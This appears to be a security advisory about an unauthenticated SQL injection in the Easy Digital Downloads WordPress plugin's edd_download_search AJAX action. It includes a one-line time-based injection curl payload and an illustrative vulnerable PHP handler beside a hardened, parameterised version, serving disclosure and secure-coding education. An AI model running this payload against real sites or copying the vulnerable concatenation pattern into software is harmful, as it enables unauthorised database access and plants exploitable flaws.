The plugin does not properly sanitise and escape the s parameter before using it in a SQL statement via the edd_download_search AJAX action, leading to a SQL injection exploitable by unauthenticated users.
curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
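As an added illustration of the flaw class the advisory describes (this is constructed example code, not Easy Digital Downloads' own source): a hypothetical WordPress AJAX search handler that concatenates the s parameter into a LIKE query, placed beside a hardened version that uses $wpdb->esc_like() and $wpdb->prepare() so the value is bound as a string and never parsed as SQL. The function and hook names prefixed hypothetical_ are assumptions; the wp_ajax_{action} / wp_ajax_nopriv_{action} hook convention is WordPress's own, and the nopriv hook is what makes an action reachable without authentication.

```php
<?php
// Constructed illustration, not Easy Digital Downloads' own code.
// Shows the unsanitised-interpolation pattern the advisory refers to,
// followed by the hardened equivalent.

// Vulnerable pattern: raw request input concatenated into the SQL string.
function hypothetical_download_search_vulnerable() {
    global $wpdb;
    $s = isset( $_GET['s'] ) ? $_GET['s'] : '';
    // A single quote in $s terminates the string literal, so everything
    // after it is interpreted by MySQL as SQL rather than as search text.
    $sql = "SELECT ID, post_title FROM {$wpdb->posts}
            WHERE post_type = 'download' AND post_status = 'publish'
              AND post_title LIKE '%" . $s . "%' LIMIT 30";
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Hardened pattern:
//  - wp_unslash() + sanitize_text_field() normalise the incoming string,
//  - $wpdb->esc_like() makes '%' and '_' in the input literal wildcards-off,
//  - $wpdb->prepare() with a %s placeholder quotes and escapes the value,
//    so it cannot change the structure of the statement.
function hypothetical_download_search_hardened() {
    global $wpdb;
    $s = isset( $_GET['s'] ) ? sanitize_text_field( wp_unslash( $_GET['s'] ) ) : '';
    $like = '%' . $wpdb->esc_like( $s ) . '%';
    $sql  = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts}
         WHERE post_type = 'download' AND post_status = 'publish'
           AND post_title LIKE %s LIMIT 30",
        $like
    );
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Registering both hooks exposes the action to logged-in and anonymous
// callers alike; only the hardened handler should ever be wired up.
// (Hook names follow WordPress's wp_ajax_{action} / wp_ajax_nopriv_{action}
// convention; the action name itself is a placeholder here.)
add_action( 'wp_ajax_hypothetical_download_search', 'hypothetical_download_search_hardened' );
add_action( 'wp_ajax_nopriv_hypothetical_download_search', 'hypothetical_download_search_hardened' );
```

When reviewing a fix for this class of bug, check that every user-controlled value reaching $wpdb->query() or $wpdb->get_results() passes through $wpdb->prepare() (or an equivalent parameterised path), that LIKE arguments are additionally run through $wpdb->esc_like(), and that the nopriv hook is only registered when unauthenticated access is genuinely required.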